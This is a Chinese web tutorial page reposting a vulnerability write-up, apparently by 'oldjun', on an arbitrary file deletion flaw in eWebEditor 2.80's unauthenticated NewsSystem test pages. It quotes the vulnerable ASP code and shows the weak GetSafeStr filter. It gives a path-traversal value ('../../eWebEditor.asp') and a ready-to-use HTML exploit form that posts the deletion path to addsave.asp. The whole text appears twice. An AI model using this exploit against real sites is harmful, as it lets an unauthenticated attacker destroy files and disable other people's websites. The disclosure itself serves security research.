七彩课堂[网页设计ASP.NET教程系列]
Ewebeditor删除任意文件漏洞
Ewebeditor删除任意文件漏洞
Ewebeditor2.80最终版删除任意文件漏洞
eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:
‘ 把带”|”的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, “|”)
‘ 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
‘ 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next
而aSavePathFileName是前面从数据库取出来的:
sSavePathFileName = oRs(”D_SavePathFileName”)
看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:
sSavePathFileName = GetSafeStr(Request.Form(”d_savepathfilename”))
…
oRs(”D_SavePathFileName”) = sSavePathFileName
居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), “‘”, “”), Chr(34), “”), “;”, “”)
End Function
这不是烬滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中 d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新 闻,于是主目录下的eWebEditor.asp不见了!
------------------------
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun(http://www.oldjun.com)</TITLE><style>body,p,td,input {font-size:9pt}</style></HEAD><BODY><a href='list.asp'>新闻列表</a> | <a href='add.asp'>增加新闻</a> <b>增加新闻</b> <form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"method="post" name="myform"><input type=hidden name=d_originalfilename><input type=hidden name=d_savefilename><table cellspacing=3 align=center><tr><td>要删的文件(相对路径就可以了):</td><td><input type="text" name="d_savepathfilename" value="" size="90"></td></tr><tr><td>新闻标题(随便填):</td><td><input type="text" name="d_title" value="" size="90"></td></tr><tr><td>标题图片:</td><td><select name="d_picture" size=1><option value=''>无</option></select>当编辑区有插入图片时,将自动填充此下拉框</td></tr><tr><td>新闻内容(随便填):</td><td><textarea name="d_content"></textarea></td></tr></table> <input type=submit name=btnSubmit value=" 提 交 "><input type=reset name=btnReset value=" 重 填 "></form></BODY></HTML>
Ewebeditor2.80最终版删除任意文件漏洞
eWebEditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框<TEXTAREA>替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:
‘ 把带”|”的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, “|”)
‘ 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
‘ 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next
而aSavePathFileName是前面从数据库取出来的:
sSavePathFileName = oRs(”D_SavePathFileName”)
看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:
sSavePathFileName = GetSafeStr(Request.Form(”d_savepathfilename”))
…
oRs(”D_SavePathFileName”) = sSavePathFileName
居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), “‘”, “”), Chr(34), “”), “;”, “”)
End Function
这不是烬滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中 d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新 闻,于是主目录下的eWebEditor.asp不见了!
------------------------
提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun(http://www.oldjun.com)</TITLE><style>body,p,td,input {font-size:9pt}</style></HEAD><BODY><a href='list.asp'>新闻列表</a> | <a href='add.asp'>增加新闻</a> <b>增加新闻</b> <form action="http://127.0.0.1/editor/Example/NewsSystem/addsave.asp"method="post" name="myform"><input type=hidden name=d_originalfilename><input type=hidden name=d_savefilename><table cellspacing=3 align=center><tr><td>要删的文件(相对路径就可以了):</td><td><input type="text" name="d_savepathfilename" value="" size="90"></td></tr><tr><td>新闻标题(随便填):</td><td><input type="text" name="d_title" value="" size="90"></td></tr><tr><td>标题图片:</td><td><select name="d_picture" size=1><option value=''>无</option></select>当编辑区有插入图片时,将自动填充此下拉框</td></tr><tr><td>新闻内容(随便填):</td><td><textarea name="d_content"></textarea></td></tr></table> <input type=submit name=btnSubmit value=" 提 交 "><input type=reset name=btnReset value=" 重 填 "></form></BODY></HTML>
信息推荐
资讯中心 | 电子商务 | 搜索营销 | 设计学院 | 中医养生 | 养生保健 | 节日祝福 | 民俗文化 | 奇闻趣事
建站知识 | 人世百态 | 网站导航 | 传统节日 | 搜索热点 | 星座运势 | 趣闻轶事 | 祝福的话 | 短信大全
© 2023 QicaiSpace.Com
建站知识 | 人世百态 | 网站导航 | 传统节日 | 搜索热点 | 星座运势 | 趣闻轶事 | 祝福的话 | 短信大全
© 2023 QicaiSpace.Com